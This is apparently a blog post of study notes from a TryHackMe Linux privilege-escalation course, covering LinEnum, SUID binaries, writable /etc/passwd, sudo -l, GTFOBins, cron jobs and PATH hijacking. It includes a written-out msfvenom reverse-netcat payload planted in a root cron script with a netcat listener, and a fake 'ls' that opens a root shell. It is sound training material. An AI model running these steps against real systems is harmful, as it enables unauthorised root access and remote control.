THM – Common Linux Privilege Escalation – Part 20

This is a continued series where I document my path through different tryhackme courses. I recommend everyone that wants to learn cyber security to subscribe to and take the courses there.

Direction og Privilege Escalation

Two main privilege escalation variants.

  • Horizontal privilege escalation

Expand your reach over the compromised system by taking over a different user who is on the same privilege level as you.

  • Vertical privilege escalation

Attempt to gain higher privilege or access, with an existing account that you have already compromised.



LinEnum is a simple bash script that performs common commands related to privesc.

How to get LinEnum on the target machine?

Two methods, the first one which I prefer is to start a simple HTTP server on the attacking machine, with command python3 -m http.server <any port>. Then wget on target machine with http://ip:port/ . After that make the script executable with chmod +x

Second method is just to copy the raw LinEnum code and paste it in a new file on the target machine. Then make it executable.

Understanding LinEnum output

Kernel Kernel information is shown here. Most likely a kernel exploit available for this machine.

Can we read/write sensitive files – These are files that any authenticated user can read and write to. We can see where there is misconfiguration that allows users who shouldn’t usually be able to, to be able to write to sensitive files.

SUID Files – SUID (Set owner user ID up on execution) is a special type of file permissions of whoever the owner is. If this is root, it runs with root permissions. It can allow us to escalate privileges.

Crontab Contents – Crontab file containing commands and instructions for the cron daemon to execute.

Abusing SUID/GUID Files

Finding and exploiting SUID Files

First step in Linux privesc is to check for files with SUID/GUID bit set. This measn that the file or files can run with the permissions of the file owner/group.

What is a SUID binary?

Demonstration of how maximum privileges look (rwx-rwx-rwx):

r = read

w = write

x = execute

   user     group     others

    rwx       rwx       rwx

    421       421       421

The maximum number of bit that can be used to set permissions for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set permissions using chmod as 755, then it will be: rwxr-xr-x.

But when special permissions are given to each user it becomes SUID or SGID. When extra bit “4” is set to user (Owner) it becomes SUID (Set user ID) and when “2” is set to group it becomes SGID (Set Group ID).

The permissions to look for when looking for SUID is:





Finding SUID Binaries

The command:

find / -perm -u=s -type f 2>/dev/null

This command searches the file system for SUID/GUID files.

find –initiated find command

/ – searches the whole system

-perm – searches for files with specific permissions

-u=s – any of the permissions bits mode are set for the file. Symbolic mode are accepted In this form

-type f – only search for files

2>/dev/null – Suppresses error

Exploiting Wriitable /etc/passwd

/etc/passwd file stores essential information, which is required to login. (User account information). /etc/passwd is a plain text file. It contains a list of the systems accounts, giving for each account some useful information like user ID, group ID, home directory, shell and more.

/etc/passwd should have general read permissions as many command utilities use it to map user IDs to user names. Write access to the /etc/passwd must only limit for the superuser/root account. If you have write permissions it can allow you to create a root user that you can access.

Understanding /etc/passwd format

/etc/passwd file contains one entry per line for each user (user account) of the system. All field are separated by a colon : symbol. Seven fields.


(as divided by colon (:))

  1. Username: Used when user logs in. Should be between 1 and 32 character in length
  2. Password: x characted indicates that encrypted password is stored in /etc/shadow file. Note that you need to use the passwd command to compute the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file. In this case the password hash is stored as an “x”.
  3. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. UID 100-999 are reserved by system for administrative and system accounts/group.
  4. Groupd ID (GID): Primary groupd ID (stored in /etc/group file)
  5. User ID info: The comment field. Allows you to add extra information about the user.
  6. Home Directory: Absolute path to the directory the user will be in when they log in. If this dir doesn’t exist then users directory becomes /
  7. Command/shell: Absolute path of a command or shell (/bin/bash). Note that it does not have to be a shell.

How to exploit a writeable /etc/passwd

If we have writeable /etc/passwd file, we can write a new line entry according to the above formula and create a new user. We add the password hash of our choice and set the UID, GID and shell to root.

Escaping Vi Editor

Sudo -l

You should always try this command when in a CTF scenario. This command lists what you’re able to use as a super user on that account. You will sometimes find that you are able to run certain commands a root user without the root password. This can enable PrivEsc.

Misconfigured Binaries and GTFOBins

If you find a misconfigured binary during your enumeration, or when you check what binaries a user account you have access to can access, you should look up how to exploit them in GTFOBins.

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

Exploiting Crontab

What is Cron?

Cron daemon is a long-running process that executes commands at specific dates and times. You can use this to schedule activities, either as one-time event or as recurring tasks.

How to view what cronjobs are active

We can use the command cat /etc/crontab to view cron jobs that are scheduled.

Format of a cronjob

Cronjobs exists in a certain format. Lets break down the format:

# = ID

m = Minutes

h = Hour

dom = day of the month

mon = Month

dow = Day of the week

user = What user the command will run as

command = What command should be run


# m h dom mon dow user command

17 * 1 * * * root cd / && run-parts –report /etc/cron.hourly

How can we exploit this?

Lets that that a file names is scheduled to run every five minute. Its owned by root, meaning that it will run with root privileges, despite the fact that we can write to this file. The task is then to create a command that will return a shell and paste it in this file. When the file runs again in five minutes the shell will be running as root.


  1. Create a payload using msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
  2. Echo the msfvenom output to the script
  3. After copying the code into the script, wait for the cron to execute the file. Start a netcat listener using nc -lvnp 8888 and wait for the shell.

Exploitning PATH Variable

What is PATH?

PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by user.

To view Path of relevant user, use command echo $PATH.

How to escalate privielges?

Lets say we have an SUID binary. Running it, we can see that its calling the system shell to do a basic process like list process with “ps”. To exploit it, we can re-write the PATH variable to a location of our choosing. So when the SUID binary calls the system shell to run an executable, it runs one that we’ve written instead.

As with SUID file, it will run this command with the same privileges as the owner of the SUID file. If this is root, using this method we can run whatever commands we like as root.


  1. The script runs the ls-command. To imitate the command, change dir to tmp.
  2. In the tmp we create a imitation executable. Format is echo “whatever command” > name of the executable. echo “/bin/bash” > ls
  3. Make it executable. chmod +x ls
  4. Change the PATH variable, so that it points to the dir where our imitation ls is stored. export PATH=/tmp:$PATH
  5. This will cause you to open a bash prompt every time you use ls. To use the “real” ls, use /bin/ls.
  6. To reset, use export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH

Similar Posts